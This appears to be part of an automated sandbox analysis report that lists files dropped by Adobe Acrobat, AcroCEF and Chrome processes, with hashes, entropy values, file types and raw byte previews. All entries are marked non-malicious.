                                                                                                                                                SHA-256:096B040219B72E2DD7AE7EA49FDC563A6F1A6B84FF25460819E6EFA97555B854
                                                                                                                                                SHA-512:46F2A9EABCDE55F1C02E98E9D6E83EE8ACAC827D806979A3ABD1B19DBA20EC1C5BA3ED6AA09F0417CC5F5F55CB34BC2B5AC5977D89324E8C10FA3D878B2414AF
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:SQLite Rollback Journal
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):8720
                                                                                                                                                Entropy (8bit):1.3426494274333258
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:7+tcASY9QmQ6QeKf7cLESiAi0mY9QAqLBx/XYKQvGJF7urs/:7MclYXtrKTcI8KYdqll2GL7ms/
                                                                                                                                                MD5:4045F635C8485107C7879E26CFC03835
                                                                                                                                                SHA1:8716F6319AA8265439DCDF579141772FAE5E8721
                                                                                                                                                SHA-256:02494F9E5E68528A7E62A518E9A9C30FCF63BCC2D46C887CF172B18BC75CD189
                                                                                                                                                SHA-512:C11E8F66867D22C74059D622C3C2AA7328F13534F95698E942CA942659EAF5CD468924AAA3FBD4830A64C571E0A98773E0B3BCBA66A46D00E6F760CCA3A1E584
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.... .c......>.i......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):246
                                                                                                                                                Entropy (8bit):3.5193370621730837
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K88q31RCH:Qw946cPbiOxDlbYnuRKY1Rw
                                                                                                                                                MD5:1C7C4312400E500497AFD2B7E8FE0904
                                                                                                                                                SHA1:69BB5C3D9E5FAA45950ED667FB589A58CD73BCE2
                                                                                                                                                SHA-256:BBEAACAE1853D568235833370C1E38C2527C70A469C17B06DBF48F8D24D22E72
                                                                                                                                                SHA-512:A2B80F737A833EC4C755069E1F4F4A28097630218F8ADD52422D2E940C0E3F611026F4A5A39C50EE6D58E360599A0FE1D3D126B8BB2701D035314E5E6DF597FF
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.8./.1.0./.2.0.2.4. . .1.2.:.4.7.:.3.3. .=.=.=.....
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:ASCII text, with very long lines (393)
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):16525
                                                                                                                                                Entropy (8bit):5.353642815103214
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:tbxtsuP+XEWJJQbnR8L31M7HeltV+KYm3wsa2KjF4ODkr/O8r2IUHUHMWwEyZRN2:aPL
                                                                                                                                                MD5:91F06491552FC977E9E8AF47786EE7C1
                                                                                                                                                SHA1:8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
                                                                                                                                                SHA-256:06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
                                                                                                                                                SHA-512:A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):15114
                                                                                                                                                Entropy (8bit):5.355878651346019
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:frXqQQp0XtiSnLppf1pf3nWwjyqBqkorjgrQaDxJ5UV2d5TPDumJ/l4P4NgTFOJ/:l9f3Z
                                                                                                                                                MD5:E813037E0629DBF64C9F3AC2CEDDBDCB
                                                                                                                                                SHA1:9E6B97E1FB88EEDF2EDCC8039177F77102624020
                                                                                                                                                SHA-256:349930A47BAF0C2AD9354E3A167F9D2F753A273FB72000652363FE45B2DAA23E
                                                                                                                                                SHA-512:C54789D43BF9334E1283A36C105F72F620FF96CFA13315865E9DD3BCAEDC456647DC1C402E82E44B47BAF581E498367B5A7A538FB904668924BDB9BE594E20CC
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SessionID=2bb9971e-8882-4618-96f3-e93fb9eb071a.1730134047953 Timestamp=2024-10-28T12:47:27:953-0400 ThreadID=7640 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=2bb9971e-8882-4618-96f3-e93fb9eb071a.1730134047953 Timestamp=2024-10-28T12:47:27:955-0400 ThreadID=7640 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=2bb9971e-8882-4618-96f3-e93fb9eb071a.1730134047953 Timestamp=2024-10-28T12:47:27:955-0400 ThreadID=7640 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=2bb9971e-8882-4618-96f3-e93fb9eb071a.1730134047953 Timestamp=2024-10-28T12:47:27:955-0400 ThreadID=7640 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=2bb9971e-8882-4618-96f3-e93fb9eb071a.1730134047953 Timestamp=2024-10-28T12:47:27:956-0400 ThreadID=7640 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):29752
                                                                                                                                                Entropy (8bit):5.420480241984442
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:0cbgIhPcbocbAIlncb2cbwI/RcbNcbQIVvcbMcb4IPFcbl:fhWlA/TVePW
                                                                                                                                                MD5:622ED8D624439C182750DFAB62090919
                                                                                                                                                SHA1:A26DB559DE494009D5797630F25190F11D365C8C
                                                                                                                                                SHA-256:1A32F2DFD413649FD25015E307146A3288C008EE94227C1FD33123BC9ECA9C73
                                                                                                                                                SHA-512:AB8FE7DF34F20CFD81A8ADB582BB4CA01C1CD282995C49BC212E54107C8C46548AEFA969FB96F46F0FD97F0E88E36714FC4256ABBBF052AF29D24DCE11ADF31F
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:06-10-2023 10:08:42:.---2---..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 10:08:42:.Closing File..06-10-
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):386528
                                                                                                                                                Entropy (8bit):7.9736851559892425
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                                                                MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                                                                SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                                                                SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                                                                SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57837
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1419751
                                                                                                                                                Entropy (8bit):7.976496077007677
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:/x0WL07oDGZswYIGNPJ5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07c:J0WLxDGZswZGd3mlind9i4ufFXpAXkrj
                                                                                                                                                MD5:49AB66B53686EC50DC2D1AAA52FF0300
                                                                                                                                                SHA1:D62599E679C58839E31DD61A665B39C936CEB674
                                                                                                                                                SHA-256:C47395F855765E0A3518230423E7F1A219FAC3CC6229732EE1D2400A86F8D37A
                                                                                                                                                SHA-512:F4BE6F7B711E8B4B90E941658F16A5FBE312B7FCC8CDDC8B0AAEEB2305DD30192BEF779A004B529ED7CA68AD8B074CD832A3FCFF4C26F5EB7194B8C311B81669
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1407294
                                                                                                                                                Entropy (8bit):7.97605879016224
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tOWLaGZ8ZwYIGNPS:RB3mlind9i4ufFXpAXkrfUs0kWLaGZ88
                                                                                                                                                MD5:D8B499013AE548F5A692536624785511
                                                                                                                                                SHA1:935DCDD791BC734E37C93DFA1B7E90FF602530F9
                                                                                                                                                SHA-256:84EEDEEF149B38754B0A284D8E2CB1F22136D0192499B96F85595C0692DBB53E
                                                                                                                                                SHA-512:E1A7037F2139782CA3D7F790A7A0E750F7AB6EC5D462C285BFB2E3D9E10FA006728EF223837310BD4993504285485756FD14BAC7CAE3B561E37EEF7C63BF2D87
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):758601
                                                                                                                                                Entropy (8bit):7.98639316555857
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                                                                                MD5:3A49135134665364308390AC398006F1
                                                                                                                                                SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                                                                                SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                                                                                SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 15:47:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2673
                                                                                                                                                Entropy (8bit):3.977804567071046
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:8RSdNTVFtWHyidAKZdA1FehwiZUklqeh+y+3:8aPZhy
                                                                                                                                                MD5:32D9963339BF123CE091172E233096E5
                                                                                                                                                SHA1:1F70771BA27E5C97FDAE16AE1CBBC113FE56FFB7
                                                                                                                                                SHA-256:BBE070C04A191B0201FE4996DEBAE7524CB7499540BF633AE0FCD31B0E53533F
                                                                                                                                                SHA-512:B79A70CEFB0877A4AD23BAECD4BD8F9C44FB0648841AAE0CCBE0D49A26C42A8506AAC20DF5797A59C312B3B466A8D7D68A45D43750291A14D2B4D83856F7CF50
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:L..................F.@.. ...$+.,.....u..Y)..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I\Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........>.{F.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 15:47:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2675
                                                                                                                                                Entropy (8bit):3.9954966781871817
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:8ASdNTVFtWHyidAKZdA1seh/iZUkAQkqehRy+2:8zPv9Qoy
                                                                                                                                                MD5:20BBB562A6A69215DD2682D944FA9E43
                                                                                                                                                SHA1:8D0D79483894A9EE9A5B40E9BB2303A0EFE33666
                                                                                                                                                SHA-256:E352E291191780C4086749C0743EB07553F1611A8F6BC0B554313E6FA4B44E70
                                                                                                                                                SHA-512:3C9F20AE2566EC5924938C68CA8D2645B33869ED24AA56F668D93139A207CCFDB888904FC86D0673E8E167F5BFE3892FD4CB221C0B5EB430E9B14CDEA6F0A300
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:L..................F.@.. ...$+.,....L...Y)..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I\Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........>.{F.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2689
                                                                                                                                                Entropy (8bit):4.00607036941744
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:86SdNTVFAHyidAKZdA14meh7sFiZUkmgqeh7sby+BX:81PPnly
                                                                                                                                                MD5:2FB381FB4B2E6C7AB0A2BCA20A69D0E7
                                                                                                                                                SHA1:686EBBCEF0767FE35F3544A3009BDE99585DBD03
                                                                                                                                                SHA-256:F79CBFF4ADC2DEDA92F3797DC43476BEACC56DDA30D004C98CD3CA6B03D55639
                                                                                                                                                SHA-512:260DE02093E71E9AEE08554A55CB9320C95558A290F39C1A9474FD704E6A475D6D840471714BA26CB7F1D59A0F3C66C33749EE038B203574F85268F0DDA8E881
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I\Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........>.{F.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 15:47:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2677
                                                                                                                                                Entropy (8bit):3.994623636664843
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:8+SdNTVFtWHyidAKZdA1TehDiZUkwqehNy+R:8JPcDy
                                                                                                                                                MD5:CD94EFDD7E50B8C948C922C95B653F3E
                                                                                                                                                SHA1:FBE47030BEE6231AF91629224255AA7C19AFB1A2
                                                                                                                                                SHA-256:BECFE6987893124952C9FEB54D75C58BF9516E7716FBD54BCDFF55055D18B5B2
                                                                                                                                                SHA-512:A8747702815748CBFC8D62AF7D27A10FD22D8D52D0B3624E291339D49EC74A1B2494D38799E2B71946EBD2BE462CFB7BCAE1BA59386659C6337EB013E00296FB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:L..................F.@.. ...$+.,........Y)..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I\Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........>.{F.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 15:47:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2677
                                                                                                                                                Entropy (8bit):3.9835980169963445
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:8KSdNTVFtWHyidAKZdA1dehBiZUk1W1qeh/y+C:8FPM9fy
                                                                                                                                                MD5:5CB97C48BD64CFC580330867367E1FC8
                                                                                                                                                SHA1:ED861244785DC93072382DA6E89A4F831D2814DC
                                                                                                                                                SHA-256:B96CD7095F5848FBF181AC062E5D4C02018CB9BC1B70B2484458D1A4750A51F8
                                                                                                                                                SHA-512:AA4FAF6898A41AF6B6F5C5DFF1407B450071E9968725975E8DB17F76EFF44FF41433EE6505838400626FF93DAA6F304B1541E007D71729B7483C6A4F9180C822
                                                                                                                                                Malicious:false
